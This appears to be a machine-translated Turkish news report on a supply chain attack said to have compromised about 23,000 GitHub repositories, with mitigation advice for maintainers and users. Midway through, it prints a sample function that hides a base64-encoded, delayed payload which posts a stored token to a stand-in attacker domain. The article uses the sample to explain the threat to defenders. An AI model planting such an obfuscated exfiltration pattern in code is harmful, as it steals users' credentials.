Bu hafta keşfedilen büyük bir güvenlik ihlali’nde, güvenlik uzmanlarının bugüne kadarki en büyük tedarik zinciri saldırılarından biri olarak adlandırdığı yaklaşık 23.000 GitHub deposundan ödün verildi.
Saldırganlar, kötü amaçlı kodları binlerce aşağı akış uygulamasına ve hizmetine dağıtmak için yazılım geliştirme boru hattındaki güvenlik açıklarından yararlandı.
200 milyondan fazla depoya ev sahipliği yapan ve dünya çapında 100 milyondan fazla geliştirici tarafından kullanılan bir platform olan Github, birkaç popüler açık kaynaklı projenin kod tabanlarına yetkisiz taahhüt bildirdikten sonra saldırıyı doğruladı.
Bu depolar toplu olarak milyonlarca başvuru için bağımlılık görevi görerek bu güvenlik olayının potansiyel etkisini artırır.
Step Secutity Güvenlik Araştırmacıları, ilgisiz depolarda şüpheli taahhüt faaliyetlerini fark ettikten sonra saldırı modelini belirlediler.
Saldırı, öncelikle yüksek indirme sayılarına sahip depoları ve kurumsal uygulamalarda bağımlılık olarak kullanılan depoları hedef aldı ve etkiyi en üst düzeye çıkarmak için hesaplanmış bir strateji ortaya koydu.
Teknik analiz, saldırganların kimlik avı saldırılarının bir kombinasyonu ve jeton sızıntılarının bir kombinasyonu yoluyla bakım hesaplarını uzlaştırmak için sofistike bir yaklaşım kullandığını ortaya koydu.
Erişim kazandıktan sonra, rutin kod incelemeleri sırasında tespit edilmesi zor olacak kötü amaçlı kod parçacıkları enjekte ettiler.
Enjekte edilen kod tipik olarak aşağıdaki örneğe benzer gizlenmiş yükler içeriyordu:-
function validate(input) {
// Legitimate-looking function
let result = checkFormat(input);
// Malicious payload hidden within normal code
setTimeout(() => {
new Function(atob("ZmV0Y2goJ2h0dHBzOi8vbWFsaWNpb3VzLWRvbWFpbi5jb20vYycsIHttZXRob2Q6ICdQT1NUJywgYm9keTogSlNPTi5zdHJpbmdpZnkoe2Q6IGxvY2FsU3RvcmFnZS5nZXRJdGVtKCd0b2tlbicpfSl9KTs="))();
}, 10000);
return result;
}.webp)
Azaltma çabaları
Proje bakımcılarına, özellikle paket yapılandırma dosyalarını veya bağımlılık bildirimlerini değiştiren son taahhütleri denetlemeleri önerilir.
GitHub, kötü niyetli değişiklikleri geri almak ve ek güvenlik önlemleri uygulamak için bakımcılarla çalışırken etkilenen depolara erişimi geçici olarak kısıtlamıştır.
Güvenlik uzmanları, kullanıcıların bağımlılıklarını acilen kontrol etmesini ve doğrulanmış sürümlere güncellenmesini önerir.
Kuruluşlar, yazılım tedarik zinciri güvenlik uygulamalarını gözden geçirmeli ve üretim sistemlerini etkilemeden önce potansiyel uzlaşmaları tespit etmek için otomatik tarama araçları uygulamalıdır.
.webp)
Saldırı, yazılım tedarik zincirini güvence altına almanın artan önemini göstermektedir, çünkü tek bir uzlaşmış bağımlılık binlerce aşağı akış uygulamasını etkileyebilir ve hassas verileri çok sayıda kuruluşta ortaya çıkarabilir.
Are you from SOC/DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Start Now for Free.